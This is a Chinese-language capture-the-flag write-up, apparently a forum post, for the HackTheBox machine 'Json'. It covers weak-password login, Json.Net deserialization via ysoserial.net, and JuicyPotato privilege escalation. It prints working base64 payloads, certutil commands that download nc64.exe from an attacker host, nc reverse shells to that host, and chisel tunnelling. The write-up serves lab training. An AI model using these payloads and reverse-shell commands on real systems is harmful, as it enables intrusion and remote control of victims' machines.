Json是一个中等难度的靶机,知识点涉及弱口令漏洞、JavaScript反混淆、Json反序列化、烂土豆提权
FileZilla密码替换等。感兴趣的同学可以在HackTheBox中进行学习。
通关思维导图
0x01 侦查
端口探测
首先使用 nmap 进行端口扫描
nmap -Pn -p- -sV -sC -A 10.10.10.158 -oA nmap_Json
扫描结果显示目标开放了21、80、135、445、5985、47001等端口
80端口
访问站点首先会跳转进入至管理界面,随后重定向至登陆界面
使用 Burp Suite 查看请求包进行分析,请求的 js 文件大多响应 404
使用 Burp Suite 拦截请求包,在此之前请清除浏览器当中的页面缓存,否则请求不会经过 Burp Suite
这确实是一个控制面板,且不需要进行身份验证。放包后会跳转至登陆界面
JavaScript反混淆
请求文件/js/app.min.js返回混淆代码
放入网站中进行反混淆操作,手工替换后拿到原 js 代码
网站地址:http://jsnice.org/
'use strict';
angular["module"]("json", ["ngCookies"])["controller"]("loginController", ["$http", "$sc
ope", "$cookies", function(elem, data, isSlidingUp) {
data["credentials"] = {
UserName : "",
Password : ""
};
data["error"] = {
message : _0xd18f[18],
show : false
};
var _0x30f6x4 = isSlidingUp["get"]("OAuth2");
if (_0x30f6x4) {
window["location"]["href"] = "index.html";
}
/**
* @return {undefined}
*/
data["login"] = function() {
elem["post"]("/api/token", data["credentials"])["then"](function(canCreateDiscussions) {
window["location"]["href"] = "index.html";
}, function(body) {
data["error"]["message"] = "Invalid Credentials.";
/** @type {boolean} */
data["error"]["show"] = true;
console["log"](body);
});
};
}])["controller"]("principalController", ["$http", "$scope"], "$cookies", function
($http, isSlidingUp, canCreateDiscussions) {
var _0x30f6x4 = canCreateDiscussions["get"]("OAuth2");
if (_0x30f6x4) {
$http["get"]("/api/Account/", {
headers : {
"Bearer" : _0x30f6x4
}
})["then"](function(canCreateDiscussions) {
isSlidingUp["UserName"] = canCreateDiscussions["data"]["Name"];
}, function(canCreateDiscussions) {
canCreateDiscussions["remove"]("OAuth2");
window["location"]["href"] = "login.html";
});
} else {
window["location"]["href"] = "login.html";
}
}]);
代码中将windows.location.href设置为login.html,同时基于 OAuth2 调用/api/account
弱口令
使用异常简单的admin/admin能够直接登陆目标站点
与此同时使用 Burp Suite 抓取登陆请求包,它向/api/token发送明文的账号密码
目标则返回 OAuth2 的 Cookie 值
Cookie 值通过 base64 解码后登陆用户的个人信息
echo 'eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3Y
TVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZ
G1pbmlzdHJhdG9yIn0=' | base64 -d
0x02 上线[userpool]
API模糊测试
在 http 请求包中存在两个参数引人注目,分别是 Cookie 和 Bearer
Cookie
首先在 Cookie 中进行修改,结果未发生变化
Bearer
在 Bearer 中进行修改,返回数据包发生变化说明可能存在反序列化漏洞
反序列化
在 Bearer 中提供错误输入时服务器返回Json.Net Object,使用YSoSerial.Net
工具可用于 .Net 反序列化攻击
工具下载地址:https://github.com/pwntester/ysoserial.net
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping 10.10.14.16" -o base64
成功生成序列化 POC 并替换请求头中的 Bearer
ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCB
QcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFs
LCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWU
nOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzd
GVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vsd
HVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgIC
AgJyR2YWx1ZXMnOlsnY21kJywgJy9jIHBpbmcgMTAuMTAuMTQuMTYnXQ0KICAgIH0sDQogIC
AgJ09iamVjdEluc3RhbmNlJzp7JyR0eXBlJzonU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN
5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuP
WI3N2E1YzU2MTkzNGUwODknfQ0KfQ==
同时监听 icmp 数据包并发送带有 POC 的请求
tcpdump -i tun0 icmp
成功在本地接收到 icmp 数据包,说明命令执行成功
使用ysoserial.exe序列化命令:通过 http 服务下载 nc
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "certutil -urlcache -split -f http://10.10.14.16
/nc64.exe c:/windows/System32/spool/drivers/color/nc64.exe" -o base64
生成如下 base64 编码
ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZ
W50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWN
LZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogIC
AgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF
5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZX
lUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIGNlcnR1
dGlsIC11cmxjYWNoZSAtc3BsaXQgLWYgaHR0cDovLzEwLjEwLjE0LjE2L25jNjQuZXhlIGM6L3dpbmRvd3
MvU3lzdGVtMzIvc3Bvb2wvZHJpdmVycy9jb2xvci9uYzY0LmV4ZSddDQogICAgfSwNCiAgICAnT2JqZW
N0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCB
WZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYx
OTM0ZTA4OSd9DQp9
监听 443 端口
nc -nvlp 443
开启 http 服务
python3 -m http.server 80
使用ysoserial.exe序列化命令:执行反弹shell
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "c:/windows/System32/spool/driv
ers/color/nc64.exe -e cmd.exe 10.10.14.16 443" -o base64
生成如下 base64 编码
ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50
YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2t
lbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZF
BhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3
JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1Nj
E5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIGM6L3dpbmRvd3MvU3lzdGVtMzIvc3Bv
b2wvZHJpdmVycy9jb2xvci9uYzY0LmV4ZSAtZSBjbWQuZXhlIDEwLjEwLjE0LjE2IDQ0MyddDQogICAgfSwNCiA
gICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdG
VtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxO
TM0ZTA4OSd9DQp9
成功拿到反弹shell,在当前用户桌面上寻找第一个flag
dir c:\Users\userpool\Desktop
type c:\Users\userpool\Desktop\user.txt
成功拿到第一个flag
0x03 权限提升[system]
内核提权
信息收集
查看系统信息
systeminfo
系统版本为 Windows Server 2012,使用 Windows-Exploit-Suggester 查找相关内核漏洞
python windows-exploit-suggester.py --database 2021-05-18-m
ssb.xls --systeminfo systeminfo.txt
结果显示可用多个漏洞进行提权,查看用户权限发现SeImpersonatePrivilege已开启这
就意味着我们可使用烂土豆进行提权
whoami /priv
烂土豆利用
编写 bat 脚本rev.bat
\windows\system32\spool\drivers\color\nc64.exe -e cmd.exe 10.10.14.16 4444
使用 http 服务将其上传至c:/windows/System32/spool/drivers/color/目录当中
certutil -urlcache -split -f http://10.10.14.16/rev.bat c:/windo
ws/System32/spool/drivers/color/rev.bat
在本地建立 smb 共享
python3 smbserver.py -smb2support mac -username mac -passwo
rd mac ~/hackthebox/Machines/Json
使用 smb 共享制定一个 CLSID 运行烂土豆
net use \\10.10.14.16\mac /u:mac mac
\\10.10.14.16\mac\JuicyPotato.exe -t * -p \windows\system32\spool\drivers\color\re
v.bat -l 9001 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
在本地监听 4444 端口
nc -nvlp 4444
但是无法运行,查其原因貌似是未连接 smb 服务,为什么会导致这个问题产生呢?发现原来是 smbserver
导致 smb 服务开启后靶机连接出错,换一个版本后即可连接成功
由于 smbserver 出现了小毛病,我们还是切换至 http 服务来完成传输
certutil -urlcache -split -f http://10.10.14.16/JuicyPotato.exe c:/win
dows/System32/spool/drivers/color/JuicyPotato.exe
运行烂土豆尝试获取权限
c:/windows/System32/spool/drivers/color/JuicyPotato.exe -t * -p \windows\system32\spoo
l\drivers\color\rev.bat -l 9001 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
成功拿到系统权限
在管理员 superadmin 桌面上寻找第二个flag
dir c:\Users\superadmin\Desktop
type c:\Users\superadmin\Desktop\root.txt
成功拿到第二个flag
FileZilla获取flag
发现FileZilla进程
查看本地开放端口
netstat -ano
存在之前 nmap 未探测的端口:21,查看对应进程发现这是 FileZilla 应用
tasklist | findstr 632
查看程序对应的配置文件,其中包含哈希值和管理端口(14147),尝试哈希破解但是无果
cd "c:\PROGRA~2\FileZilla Server"
type "FileZilla Server.xml"
搭建隧道
为了方便与靶机进行交互,我们可以使用 Chisel 建立隧道。首先将其上传至靶机当中
copy \\10.10.14.16\mac\chisel.exe \windows\system32\spool\drivers\color\chisel.exe
在本地开启反向代理端口8000
./chisel server -p 8000 --reverse
在靶机上连接本地8000端口
chisel.exe client 10.10.14.16:8000 R:223:localhost:14147
在本地安装 FileZilla Server,以下是安装过程
下载地址:https://filezilla-project.org/download.php?type=server
sudo dpkg -i FileZilla_Server_1.3.0_x86_64-linux-gnu.deb
但是其中并没有配置地址和端口的界面,切换至 Windows 下本机又无法连接 v\p\n,真是个头疼的问题
总结
通过弱口令可直接进入网站后台,查看http请求头信息发现Bearer标头存在反序列化漏洞,使用反序列化工具ysoserial
序列化payload,执行反弹shell拿到用户权限。在靶机中检查系统信息,其中存在许多提权漏洞,最终选择烂土豆提升
至系统权限。0xdf大神还介绍了其他两种获取flag的方式,分别是FileZill和Sync2Ftp,我这边只测试了第一种情况但
是遇到v\p\n占用问题导致实验无法继续。 |
楼主